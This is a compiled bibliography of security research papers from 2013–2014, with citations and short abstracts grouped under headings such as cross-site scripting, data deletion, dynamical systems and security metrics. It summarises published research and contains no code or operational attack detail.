  • Rieke, R.; Repp, J.; Zhdanova, M.; Eichler, J., "Monitoring Security Compliance of Critical Processes," Parallel, Distributed and Network-Based Processing (PDP), 2014 22nd Euromicro International Conference on , vol., no., pp.552,560, 12-14 Feb. 2014. (ID#:14-1629) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6787328&isnumber=6787236 Enforcing security in process-aware information systems at runtime requires the monitoring of systems' operation using process information. Analysis of this information with respect to security and compliance aspects is growing in complexity with the increase in functionality, connectivity, and dynamics of process evolution. To tackle this complexity, the application of models is becoming standard practice. Considering today's frequent changes to processes, model-based support for security and compliance analysis is not only needed in pre-operational phases but also at runtime. This paper presents an approach to support evaluation of the security status of processes at runtime. The approach is based on operational formal models derived from process specifications and security policies comprising technical, organizational, regulatory and cross-layer aspects. A process behavior model is synchronized by events from the running process and utilizes prediction of expected close-future states to find possible security violations and allow early decisions on countermeasures. The applicability of the approach is exemplified by a misuse case scenario from a hydroelectric power plant. Keywords: hydroelectric power stations; power system security; critical processes; hydroelectric power plant; model-based support; operational formal models; process behavior model; process specifications; process-aware information systems; security compliance; security policies; Automata; Business; Computational modeling; Monitoring; Predictive models; Runtime; Security; critical infrastructures; predictive security analysis; process behavior analysis; security information and event management; security modeling and simulation; security monitoring
  • Mendes, L.D.P.; Rodrigues, J.J.P.C.; Lloret, J.; Sendra, S., "Cross-Layer Dynamic Admission Control for Cloud-Based Multimedia Sensor Networks," Systems Journal, IEEE , vol.8, no.1, pp.235,246, March 2014. (ID#:14-1630) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6553353&isnumber=6740850 Cloud-based communications system is now widely used in many application fields such as medicine, security, environment protection, etc. Its use is being extended to the most demanding services like multimedia delivery. However, there are a lot of constraints when cloud-based sensor networks use the standard IEEE 802.15.3 or IEEE 802.15.4 technologies. This paper proposes a channel characterization scheme combined to a cross-layer admission control in dynamic cloud-based multimedia sensor networks to share the network resources among any two nodes. The analysis shows the behavior of two nodes using different network access technologies and the channel effects for each technology. Moreover, the existence of optimal node arrival rates in order to improve the usage of dynamic admission control when network resources are used is also shown. An extensive simulation study was performed to evaluate and validate the efficiency of the proposed dynamic admission control for cloud-based multimedia sensor networks. Keywords: IEEE standards; Zigbee; channel allocation; cloud computing; control engineering computing; multimedia communication; telecommunication congestion control; wireless sensor networks; channel characterization scheme; channel effects; cloud-based communications system; cloud-based sensor networks; cross-layer admission control; cross-layer dynamic admission control; dynamic cloud-based multimedia sensor networks; extensive simulation study; multimedia delivery; network access technology; network resources; optimal node arrival rates; standard IEEE 802.15.3 technology; standard IEEE 802.15.4 technology; Admission control; cloud computing; cross-layer design; multimedia communications ;sensor networks
  • Kumar, G.V.P.; Reddy, D.K., "An Agent Based Intrusion Detection System for Wireless Network with Artificial Immune System (AIS) and Negative Clone Selection," Electronic Systems, Signal Processing and Computing Technologies (ICESC), 2014 International Conference on , vol., no., pp.429,433, 9-11 Jan. 2014. (ID#:14-1631) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6745417&isnumber=6745317 Intrusion in Wireless network differs from IP network in a sense that wireless intrusion is both of packet level as well as signal level. Hence a wireless intrusion signature may be as simple as say a changed MAC address or jamming signal to as complicated as session hijacking. Therefore merely managing and cross verifying the patterns from an intrusion source are difficult in such a network. Beside the difficulty of detecting the intrusion at different layers, the network credential varies from node to node due to factors like mobility, congestion, node failure and so on. Hence conventional techniques for intrusion detection fail to prevail in wireless networks. Therefore in this work we device a unique agent based technique to gather information from various nodes and use this information with an evolutionary artificial immune system to detect the intrusion and prevent the same via bypassing or delaying the transmission over the intrusive paths. Simulation results show that the overhead of running AIS system does not vary and is consistent for topological changes. The system also proves that the proposed system is well suited for intrusion detection and prevention in wireless network. Keywords: access protocols; artificial immune systems; jamming; packet radio networks; radio networks; security of data; AIS system; IP network; MAC address; agent based intrusion detection system; artificial immune system; jamming signal; negative clone selection; network topology; session hijacking; wireless intrusion signature; wireless network; Bandwidth; Delays; Immune system; Intrusion detection; Mobile agents; Wireless networks; Wireless sensor networks; AIS; congestion; intrusion detection; mobility
  • Tsai, J., "An Improved Cross-Layer Privacy-Preserving Authentication in WAVE-enabled VANETs," Communications Letters, IEEE, vol. PP, no.99, pp.1,1, May 2014. (ID#:14-1632) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6814798&isnumber=5534602 In 2013, Biswas and Misic proposed a new privacypreserving authentication scheme for WAVE-based vehicular ad hoc networks (VANETs), claiming that they used a variant of the Elliptic Curve Digital Signature Algorithm (ECDSA). However, our study has discovered that the authentication scheme proposed by them is vulnerable to a private key reveal attack. Any malicious receiving vehicle who receives a valid signature from a legal signing vehicle can gain access to the signing vehicle private key from the learned valid signature. Hence, the authentication scheme proposed by Biswas and Misic is insecure. We thus propose an improved version to overcome this weakness. The proposed improved scheme also supports identity revocation and trace. Based on this security property, the CA and a receiving entity (RSU or OBU) can check whether a received signature has been generated by a revoked vehicle. Security analysis is also conducted to evaluate the security strength of the proposed authentication scheme. Keywords: Authentication; Digital signatures; Elliptic curves; Law; Public key; Vehicles
  • Liang Hong, Wei Chen, "Information Theory And Cryptography Based Secured Communication Scheme For Cooperative MIMO Communication In Wireless Sensor Networks," Ad Hoc Networks, Volume 14, March, 2014, (Pages 95-105). (ID#:14-1633) Available at: http://dl.acm.org/citation.cfm?id=2580129.2580645&coll=DL&dl=GUIDE&CFID=376909966&CFTOKEN=69937197 A cross-layer secured communication approach is proposed as a solution to improve and secure wireless sensor network communication. This solution examines overriding compromised external and active attacks on nodes via layered cryptographic methods and key management. A cryptographic method would be applied at higher network layers, coupled with data assurance analysis at the physical layer to bolster security in data transmission and receipt. The authors of this work also propose an information theory-based detector, at the physical layer, to detect active compromised nodes and prompt the key management system to revoke keys. Results of simulations are discussed.
  • Tobias Oder, Thomas Poppelmann, Tim Guneysu, "Beyond ECDSA and RSA: Lattice-based Digital Signatures on Constrained Devices," DAC '14 Proceedings of the The 51st Annual Design Automation Conference on Design Automation Conference, June 2014, (Pages 1-6). (ID#:14-1634) Available at: http://dl.acm.org/citation.cfm?id=2593069.2593098&coll=DL&dl=GUIDE&CFID=376909966&CFTOKEN=69937197 This paper argues the inadequacy of currently used asymmetric cryptography in the face of robustly effective quantum computing. Recognizing the need for alternatives, particularly for systems with continuous security requirements, such as aviation and automobiles, the authors propose lattice-based cryptography as a sustainable solution. The authors present this solution as an implementation of BLISS, a post-quantum secure signature scheme, which this paper shows significantly improves signing and verification. Keywords: (not provided)
  • Ana Nieto, Javier Lopez, "A Model for the Analysis of QoS and Security Tradeoff in Mobile Platforms," Mobile Networks and Applications, Volume 19 Issue 1, February 2014, (Pages 64-78). (ID#:14-1635) Available at: http://dl.acm.org/citation.cfm?id=2582353.2582359&coll=DL&dl=GUIDE&CFID=376909966&CFTOKEN=69937197 This paper addresses the popular, widespread use of mobile devices, and the conflicting security and quality of service (QoS) requirements which accompany mobile platform usage. The authors of this paper propose a Parametric Relationship Model (PRM), to determine Security and QoS correlation. Increased usability, security, and efficiency for mobile platforms are considered in terms of the Future Internet.

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Cross Site Scripting

Cross Site Scripting


A type of computer security vulnerability typically found in Web applications, Cross-site scripting (XSS) enables attackers to inject client-side script into Web pages viewed by other users. Attackers may use a cross-site scripting vulnerability to bypass access controls such as the same origin policy. Consequences may range from petty nuisance to significant security risk, depending on the value of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner. A frequent method of attack, research is being conducted on methods to prevent, detect, and mitigate XXS attacks.

  • Abgrall, Erwan; Traon, Yves Le; Gombault, Sylvain; Monperrus, Martin, "Empirical Investigation of the Web Browser Attack Surface under Cross-Site Scripting: An Urgent Need for Systematic Security Regression Testing," Software Testing, Verification and Validation Workshops (ICSTW), 2014 IEEE Seventh International Conference on , vol., no., pp.34,41, March 31 2014-April 4 2014. (ID#:14-1636) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6825636&isnumber=6825623 One of the major threats against web applications is Cross-Site Scripting (XSS). The final target of XSS attacks is the client running a particular web browser. During this last decade, several competing web browsers (IE, Netscape, Chrome, Firefox) have evolved to support new features. In this paper, we explore whether the evolution of web browsers is done using systematic security regression testing. Beginning with an analysis of their current exposure degree to XSS, we extend the empirical study to a decade of most popular web browser versions. We use XSS attack vectors as unit test cases and we propose a new method supported by a tool to address this XSS vector testing issue. The analysis on a decade releases of most popular web browsers including mobile ones shows an urgent need of XSS regression testing. We advocate the use of a shared security testing benchmark as a good practice and propose a first set of publicly available XSS vectors as a basis to ensure that security is not sacrificed when a new version is delivered. Keywords: Browsers; HTML; Mobile communication; Payloads; Security; Testing; Vectors; XSS; browser; regression; security; testing; web
  • Bozic, Josip; Wotawa, Franz, "Security Testing Based on Attack Patterns," Software Testing, Verification and Validation Workshops (ICSTW), 2014 IEEE Seventh International Conference on , vol., no., pp.4,11, March 31 2014-April 4 2014. (ID#:14-1637) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6825631&isnumber=6825623 Testing for security related issues is an important task of growing interest due to the vast amount of applications and services available over the internet. In practice testing for security often is performed manually with the consequences of higher costs, and no integration of security testing with today's agile software development processes. In order to bring security testing into practice, many different approaches have been suggested including fuzz testing and model-based testing approaches. Most of these approaches rely on models of the system or the application domain. In this paper we suggest to formalize attack patterns from which test cases can be generated and even executed automatically. Hence, testing for known attacks can be easily integrated into software development processes where automated testing, e.g., for daily builds, is a requirement. The approach makes use of UML state charts. Besides discussing the approach, we illustrate the approach using a case study. Keywords: Adaptation models; Databases; HTML; Security; Software; Testing; Unified modeling language; Attack pattern; SQL injection; UML state machine; cross-site scripting; model-based testing; security testing
  • Aydin, Abdulbaki; Alkhalaf, Muath; Bultan, Tevfik, "Automated Test Generation from Vulnerability Signatures," Software Testing, Verification and Validation (ICST), 2014 IEEE Seventh International Conference on , vol., no., pp.193,202, March 31 2014-April 4 2014. (ID#:14-1638) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6823881&isnumber=6823846 Web applications need to validate and sanitize user inputs in order to avoid attacks such as Cross Site Scripting (XSS) and SQL Injection. Writing string manipulation code for input validation and sanitization is an error-prone process leading to many vulnerabilities in real-world web applications. Automata-based static string analysis techniques can be used to automatically compute vulnerability signatures (represented as automata) that characterize all the inputs that can exploit a vulnerability. However, there are several factors that limit the applicability of static string analysis techniques in general: 1) undesirability of static string analysis requires the use of approximations leading to false positives, 2) static string analysis tools do not handle all string operations, 3) dynamic nature of the scripting languages makes static analysis difficult. In this paper, we show that vulnerability signatures computed for deliberately insecure web applications (developed for demonstrating different types of vulnerabilities) can be used to generate test cases for other applications. Given a vulnerability signature represented as an automaton, we present algorithms for test case generation based on state, transition, and path coverage. These automatically generated test cases can be used to test applications that are not analyzable statically, and to discover attack strings that demonstrate how the vulnerabilities can be exploited. Keywords: automata-based test generation; string analysis; validation and sanitization; vulnerability signatures
  • Erwan Abgrall, Yves Le Traon, Sylvain Gombault, Martin Monperrus, "Empirical Investigation of the Web Browser Attack Surface under Cross-Site Scripting: An Urgent Need for Systematic Security Regression Testing," ICSTW '14 Proceedings of the 2014 IEEE International Conference on Software Testing, Verification, and Validation Workshops, March 2014, (pages 34-41}. (ID#:14-1639) Available at: http://dl.acm.org/citation.cfm?id=2624300.2624420&coll=DL&dl=GUIDE&CFID=479068957&CFTOKEN=54071302 This publication distinguishes Cross-Site Scripting (XSS) as a significant threat to web applications. The authors of this publication discuss advancements in several web browsers (IE, Netscape, Chrome, Firefox), and attempt to determine if systematic security regression testing was used. The browsers are evaluated on their current vulnerability to XSS, followed by an assessment using XSS attack vectors as test cases. Results indicate that XSS regression testing should be applied immediately to popularly used web browsers, including mobile browsers. The authors strongly recommend regular use of a shared security testing benchmark, and promote a set of baseline XSS vectors, available for public use.
  • Ben Stock, Martin Johns, "Protecting Users Against XSS-Based Password Manager Abuse," ASIA CCS '14 Proceedings of the 9th ACM Symposium On Information, Computer And Communications Security, June 2014, (Pages 183-194). (ID#:14-1640) Available at: http://dl.acm.org/citation.cfm?id=2590296.2590336&coll=DL&dl=GUIDE&CFID=479068957&CFTOKEN=54071302 This paper highlights the vulnerability concern with password managers. Intended to alleviate the tediousness of password authentication, password managers automatically supply previously-entered passwords in web pages. This creates chances for Cross-Site Scripting attacks to occur, as password managers merely use clear-text to insert passwords, obtainable by JavaScript. This paper offers a survey of characteristics in password fields for current password manager functionalities. The authors of this paper present an alternative password manager architecture, which defends against identified attacks.
  • M. I. P. Salas, E. Martins, "Security Testing Methodology for Vulnerabilities Detection of XSS in Web Services and WS-Security," Electronic Notes in Theoretical Computer Science (ENTCS) archive Volume 302, February, 2014, (Pages 133-154). (ID#:14-1641) Available at: http://dl.acm.org/citation.cfm?id=2583134.2583367&coll=DL&dl=GUIDE&CFID=479068957&CFTOKEN=54071302 The authors of this paper highlight existing Web services vulnerability to Cross-Site Scripting attacks (XSS). With a view to bolster XSS vulnerability detection, the authors propose utilizing Penetration Testing and Fault Injection to simulate XSS attacks. Coupled with WS-Security (WSS) and Security Tokens, this simulation method allows for identification of sender, enabling legitimate access control to communication exchange. Results indicate that WSInject, the tested fault injection tool, can be successfully used to detect XSS attack vulnerability.
  • Fabien Duchene, Sanjay Rawat, Jean-Luc Richier, Roland Groz, "KameleonFuzz: Evolutionary Fuzzing For Black-Box XSS Detection," CODASPY '14 Proceedings of the 4th ACM conference on Data and Application Security And Privacy, March 2014, (Pages 37-48). (ID#:14-1642) Available at: http://dl.acm.org/citation.cfm?id=2557547.2557550&coll=DL&dl=GUIDE&CFID=479068957&CFTOKEN=54071302 This paper addresses the concept of fuzz testing, the automated generation and deployment of malformed inputs to a web application, so that a vulnerability or bug may be discovered. The authors of this publication propose KameleonFuzz, a black-box Cross-Site Scripting (XSS) web application fuzzer that can propagate malicious inputs, as well as report its proximity to exposing a vulnerability. A double taint inference allows for notification of successful or unsuccessful exploitation attempts.

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Data Deletion and Forgetting

Data Delete and Forgetting


A recent court decision has focused attention on the problem of "forgetting," that is, eliminating links and references used on the Internet to focus on a specific topic or reference. "Forgetting," essentially a problem in data deletion, has many implications for security and for data structures. Interestingly, the reviewers found relatively few scholarly articles addressing the problem, either from a technical or a governance viewpoint. Articles published in the first six months of 2014 are cited here.

  • D'Orazio, C.; Ariffin, A.; Choo, K.-K.R., "iOS Anti-forensics: How Can We Securely Conceal, Delete and Insert Data?," System Sciences (HICSS), 2014 47th Hawaii International Conference on , vol., no., pp.4838,4847, 6-9 Jan. 2014. (ID#:14-1553) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6759196&isnumber=6758592 With increasing popularity of smart mobile devices such as iOS devices, security and privacy concerns have emerged as a salient area of inquiry. A relatively under-studied area is anti-mobile forensics to prevent or inhibit forensic investigations. In this paper, we propose a "Concealment" technique to enhance the security of non-protected (Class D) data that is at rest on iOS devices, as well as a "Deletion" technique to reinforce data deletion from iOS devices. We also demonstrate how our "Insertion" technique can be used to insert data into iOS devices surreptitiously that would be hard to pick up in a forensic investigation. Keywords: data privacy; digital forensics; iOS (operating system);mobile computing; mobile handsets; antimobile forensics; concealment technique; data deletion; deletion technique; forensic investigations; iOS antiforensics; iOS devices; insertion technique; nonprotected data security; privacy concerns; security concerns ;smart mobile devices; Cryptography; File systems; Forensics; Mobile handsets; Random access memory; Videos; iOS anti-forensics; iOS forensics; mobile anti-forensics; mobile forensics
  • Khanduja, V.; Chakraverty, S.; Verma, O.P.; Tandon, R.; Goel, S., "A Robust Multiple Watermarking Technique For Information Recovery," Advance Computing Conference (IACC), 2014 IEEE International , vol., no., pp.250,255, 21-22 Feb. 2014. (ID#:14-1554) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6779329&isnumber=6779283 Digital databases serve as the vehicles for compiling, disseminating and utilizing all forms of information that are pivotal for societal development. A major challenge that needs to be tackled is to recover crucial information that may be lost due to malicious attacks on database integrity. In the domain of digital watermarking, past research has focused on robust watermarking for establishing database ownership and fragile watermarking for tamper detection. In this paper, we propose a new technique for multiple watermarking of relational databases that provides a unified solution to two major security concerns; ownership identification and information recovery. In order to resolve ownership conflicts a secure watermark is embedded using a secret key known only to the database owner. Another watermark encapsulates granular information on user-specified crucial attributes in a manner such that the perturbed or lost data can be regenerated conveniently later. Theoretical analysis shows that the probability of successful regeneration of tampered/lost data improves dramatically as we increase the number of candidate attributes for embedding the watermark. We experimentally verify that the proposed technique is robust enough to extract the watermark accurately even after 100% tuple addition or alteration and after 98% tuple deletion. Keywords: feature extraction; granular computing; image watermarking ;relational databases; security of data; visual databases; database integrity; database ownership; digital databases; digital watermarking; fragile watermarking; granular information; Information recovery; malicious attacks; relational databases; robust multiple watermarking technique; societal development; tamper detection; tuple deletion; watermark extraction; Clustering algorithms; Conferences; Relational databases; Robustness; Watermarking; Data Recovery; Digital Watermarking; Right Protection; Robustness; Tamper Detection
  • Raluca Ada Popa, Emily Stark, Jonas Helfer, Steven Valdez, Nickolai Zeldovich, M. Frans Kaashoek, Hari Balakrishnan, "Building Web Applications On Top Of Encrypted Data Using Mylar," NSDI'14 Proceedings of the 11th USENIX Conference on Networked Systems Design and Implementation, April 2014, (Pages 157-172). (ID#:14-1555) Available at: https://www.usenix.org/system/files/conference/nsdi14/nsdi14-paper-popa.pdf?CFID=474579018&CFTOKEN=48044888 This paper discusses the potential security threats in storing private information on web application servers, as they may be accessed by those who gain entry to the server. The authors present the concept of Mylar, a web application-building platform that encrypts sensitive data stored on servers. Mylar is designed to fully protect private data against attackers, even in the event of complete malicious access to servers. With encrypted data stored on servers, Mylar decrypts the data solely in user browsers. The server will keyword search encrypted files, even if the files contain different key encryptions.
  • Michael Beiter, Marco Casassa Mont, Liqun Chen, Siani Pearson, "End-to-end Policy Based Encryption Techniques For Multi-Party Data Management," Computer Standards & Interfaces, Volume 36 Issue 4, June, 2014, (Pages 689-703). (ID#:14-1556) Available at: http://dl.acm.org/citation.cfm?id=2588915.2589305&coll=DL&dl=GUIDE&CFID=474579018&CFTOKEN=48044888 This publication centers on privacy and accountability concerns in cloud computing applications. The authors in this paper propose a solution that utilizes machine readable policies to define usage as data communicates between numerous parties. Independent third parties help adhere service providers to limited data access as defined by aforementioned policies, as well as to confirm policy compliance before dispensing requested decryption keys.
  • Bin Luo, Jingbo Xia, "A Novel Intrusion Detection System Based On Feature Generation With Visualization Strategy," Expert Systems with Applications: An International Journal, Volume 41 Issue 9, July, 2014, (Pages 4139-4147). (ID#:14-1557) Available at: http://dl.acm.org/citation.cfm?id=2588899.2588995&coll=DL&dl=GUIDE&CFID=474579018&CFTOKEN=48044888 The authors of this publication present FASVFG, a four-angle-star based visualized feature generation approach. The goal of FASVFG is to assess the difference in sample distances, in a 5-class classification case. Numerical features are developed and applied to KDDcup99 network visit data, based on the four angle star image. Keywords: Feature generation, Intrusion detection system, Visualization


Note:
Articles listed on these pages have been found on open internet pages and are cited with links to those pages. Copyright owners may request the removal of the links to their work or request amendments to the descriptions of their work posted here. Generally, these descriptions are written using the authors' abstracts, but are amended to fit the space available.

Contact: SoS.SurveyProject at gmail.com to remove or amend.





Dynamical Systems

Dynamical Systems


Research into dynamical systems cited here focuses on non-linear and chaotic dynamical systems and in proving abstractions of dynamical systems through numerical simulations. The first paper was presented at HOT SoS 2014, the Symposium and Bootcamp on the Science of Security (HotSoS), a research event centered on the Science of Security held April 8-9, 2014 in Raleigh, North Carolina.

  • Mitra, S. "Proving Abstractions of Dynamical Systems through Numerical Simulations" HOT SoS 2014 (To be published 2014 in Journals of the ACM.) (ID#:14-1362) Available at: http://www.hot-sos.org/2014/proceedings/papers.pdf A key question that arises in rigorous analysis of cyberphysical systems under attack involves establishing whether or not the attacked system deviates significantly from the ideal allowed behavior. This is the problem of deciding whether or not the ideal system is an abstraction of the attacked system. A quantitative variation of this question can capture how much the attacked system deviates from the ideal. Thus, algorithms for deciding abstraction relations can help measure the effect of attacks on cyberphysical systems and to develop attack detection strategies. In this paper, we present a decision procedure for proving that one nonlinear dynamical system is a quantitative abstraction of another. Directly computing the reach sets of these nonlinear systems are undecidable in general and reach set over-approximations do not give a direct way for proving abstraction. Our procedure uses (possibly inaccurate) numerical simulations and a model annotation to compute tight approximations of the observable behaviors of the system and then uses these approximations to decide on abstraction. We show that the procedure is sound and that it is guaranteed to terminate under reasonable robustness assumptions. Keywords: cyberphysical systems, adversary, simulation, verification, abstraction.
  • Dong Juny; Li Donghai, "Nonlinear robust control for complex dynamical systems," Control Conference (CCC), 2013 32nd Chinese , vol., no., pp.5509,5514, 26-28 July 2013. (ID#:14-1363) Available at:http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6640400&isnumber=6639389 The plants of complex dynamical systems consist of real part and imaginary part and there exits strong coupling between them. In this paper, the nonlinear robust controller is applied in the control of six typical complex dynamical systems expressed in differential equations. Two control schemes of the systems are designed. One scheme treats the real part and imaginary part of the complex dynamical systems as a whole to design a single-input single-output control system, another scheme independently deals with the real part and imaginary part to design a two-input two-output control system. The simulated results show that the nonlinear robust controller can achieve effective control for complex dynamical systems, and that the two control schemes can achieve same control performance on the premise of the same initial system states and controller parameters. Keywords: control system synthesis; differential equations; large-scale systems; nonlinear control systems; robust control; time-varying systems; complex dynamical systems; control system design; differential equations; nonlinear robust control; single-input single-output control system; two-input two-output control system; Control systems; Electronic mail; Frequency modulation; Power system dynamics; Robust control; Robustness; Thermal engineering; complex dynamical systems; nonlinear robust controller; the imaginary part; the real part
  • Brito Palma, L.; Costa Cruz, J.; Vieira Coito, F.; Sousa Gil, P., "Interactive demonstration of a java-based simulator of dynamical systems," Experiment@ International Conference (exp.at'13), 2013 2nd, vol., no., pp.176,177, 18-20 Sept. 2013 (ID#:14-1364) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6703061&isnumber=6703017 In this paper, an interactive demonstration of a java-based simulator of dynamical systems is presented. This simulator implements linear low-order process models (first order, second order and third order). Open-loop control and closed-loop tests can be done with the application. The main contribution is a Java application that can be used by the instructor / user in a blended learning environment to teach / learn the basic notions of dynamical systems, in open-loop control and also in closed-loop control, running on all the most popular operating systems. Keywords: Java ;closed loop systems; computer aided instruction; control engineering computing; control engineering education; digital simulation; interactive systems; open loop systems; Java-based simulator; automatic control; blended learning environment; closed-loop control; closed-loop tests; dynamical systems; interactive demonstration; linear low-order process models; open-loop control; operating systems; Control systems; Java; Remote laboratories; Software; Time factors; Transfer functions; automatic control; dynamical systems; engineering education ; learning systems; simulation
  • Kim, K.-K.K.; Shen, D.E.; Nagy, Z.K.; Braatz, R.D., "Wiener's Polynomial Chaos for the Analysis and Control of Nonlinear Dynamical Systems with Probabilistic Uncertainties [Historical Perspectives]," Control Systems, IEEE , vol.33, no.5, pp.58,67, Oct. 2013. (ID#:14-1365) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6595094&isnumber=6595035 One purpose of the "Historical Perspectives" column is to look back at work done by pioneers in control and related fields that has been neglected for many years but was later revived in the control literature. This column discusses the topic of Norbert Wiener's most cited paper, which proposed polynomial chaos expansions (PCEs) as a method for probabilistic uncertainty quantification in nonlinear dynamical systems. PCEs were almost completely ignored until the turn of the new millennium, when they rather suddenly attracted a huge amount of interest in the noncontrol literature. Although the control engineering community has studied uncertain systems for decades, all but a handful of researchers in the systems and control community have ignored PCEs. The purpose of this column is to present a concise introduction to PCEs, provide an overview of the theory and applications of PCE methods in the control literature, and to consider the question of why PCEs have only recently appeared in the control literature. Keywords: chaos; control system analysis; nonlinear control systems; nonlinear dynamical systems; polynomials; probability; uncertain systems; PCE; Wiener polynomial chaos expansion; nonlinear dynamical system analysis; nonlinear dynamical system control; probabilistic uncertainty quantification; uncertain systems; Approximation methods; Computational modeling; History; Mathematical model; Nonlinear systems; Probabilistic logic; Random variables; Uncertainty
  • Masuda, Kazuaki, "A method for finding stable-unstable bifurcation points of nonlinear dynamical systems by using a Particle Swarm Optimization algorithm," SICE Annual Conference (SICE), 2013 Proceedings of , vol., no., pp.554,559, 14-17 Sept. 2013. (ID#:14-1506) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6736201&isnumber=6736144 In this paper, we propose a method for finding stable-unstable bifurcation points of nonlinear dynamical systems by using a Particle Swarm Optimization (PSO) algorithm. Since the structure of systems can change suddenly at such points, it is desired to find them in advance for the purpose of engineering such as design, control, etc. We formulate a mathematical optimization problem to find a particular type of bifurcation points of nonlinear black-box systems, and we solve it numerically by employing a Particle Swarm Optimization (PSO) algorithm. Practicality of the proposed method is investigated by numerical experiments. Keywords: Aerospace electronics; Bifurcation; Linear programming; Nonlinear dynamical systems; Optimization; Trajectory; Vectors; Nonlinear dynamical systems; Particle Swarm Optimization (PSO); bifurcation; constrained optimization; multiple optimal solutions search
  • Wenwu Yu; Guanrong Chen; Ming Cao; Wei Ren, "Delay-Induced Consensus and Quasi-Consensus in Multi-Agent Dynamical Systems," Circuits and Systems I: Regular Papers, IEEE Transactions on , vol.60, no.10, pp.2679,2687, Oct. 2013. (ID#:14-1507) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6495500&isnumber=6609087 This paper studies consensus and quasi-consensus in multi-agent dynamical systems. A linear consensus protocol in the second-order dynamics is designed where both the current and delayed position information is utilized. Time delay, in a common perspective, can induce periodic oscillations or even chaos in dynamical systems. However, it is found in this paper that consensus and quasi-consensus in a multi-agent system cannot be reached without the delayed position information under the given protocol while they can be achieved with a relatively small time delay by appropriately choosing the coupling strengths. A necessary and sufficient condition for reaching consensus in multi-agent dynamical systems is established. It is shown that consensus and quasi-consensus can be achieved if and only if the time delay is bounded by some critical value which depends on the coupling strength and the largest eigenvalue of the Laplacian matrix of the network. The motivation for studying quasi-consensus is provided where the potential relationship between the second-order multi-agent system with delayed positive feedback and the first-order system with distributed-delay control input is discussed. Finally, simulation examples are given to illustrate the theoretical analysis. Keywords: {delays; eigenvalues and eigen functions; feedback; graph theory; multi-agent systems; protocols; Laplacian matrix; delayed position information; delayed positive feedback; distributed-delay control input; eigenvalue; linear consensus protocol; multiagent dynamical systems; periodic oscillations; quasiconsensus; second-order dynamics; time delay; Algebraic graph theory; delay-induced consensus; multi-agent system; quasi-consensus
  • Zhaoyan Wu; Xinchu Fu, "Structure identification of uncertain dynamical networks coupled with complex-variable chaotic systems," Control Theory & Applications, IET , vol.7, no.9, pp.1269,1275, June 13 2013. (ID#:14-1508) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6578539&isnumber=6578529 This paper recognizes the inability to predetermine all topological structures of uncertain dynamical networks in practical applications. Proposed is a structure identification method for uncertain dynamical methods associated with complex-variable chaotic systems. The proposed method is based on the Barbalatis lemma, and is verified in this paper with numerical simulations. Keywords: chaos; complex networks; nonlinear dynamical systems; numerical analysis; topology; uncertain systems; Barbalat's lemma; complex-variable chaotic systems; network estimators; node dynamics; numerical simulations; uncertain dynamical networks; uncertain topological structure.


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.



Effectiveness and Work Factor Metrics

Effectiveness and Work Factors Metrics


Effectiveness and Work Factor Metrics It is difficult to measure the relative strengths and weaknesses of modern information systems when the safety, security, and reliability of those systems must be protected. Developers often apply security to systems without the ability to evaluate the impact of those mechanisms to the overall system. Few efforts are directed at actually measuring the quantifiable impact of information assurance technology on the potential adversary. The research cited here describes analytic tools, methods and processes for measuring and evaluating software, networks, and authentication.

  • Frank L. Greitzer, Thomas A. Ferryman "Methods and Metrics for Evaluating Analytic Insider Threat Tools" SPW '13 Proceedings of the 2013 IEEE Security and Privacy Workshops, May 2013. (Pages 90-97). (ID#:14-1384) Available at: http://dl.acm.org/citation.cfm?id=2510662.2511480&coll=DL&dl=GUIDE&CFID=339335517&CFTOKEN=38610778 or http://dx.doi.org/10.1109/SPW.2013.34 The insider threat is a prime security concern for government and industry organizations. As insider threat programs come into operational practice, there is a continuing need to assess the effectiveness of tools, methods, and data sources, which enables continual process improvement. This is particularly challenging in operational environments, where the actual number of malicious insiders in a study sample is not known. The present paper addresses the design of evaluation strategies and associated measures of effectiveness; several quantitative/statistical significance test approaches are described with examples, and a new measure, the Enrichment Ratio, is proposed and described as a means of assessing the impact of proposed tools on the organization's operations. Keywords: insider threat, evaluation, validation, metrics, assessment
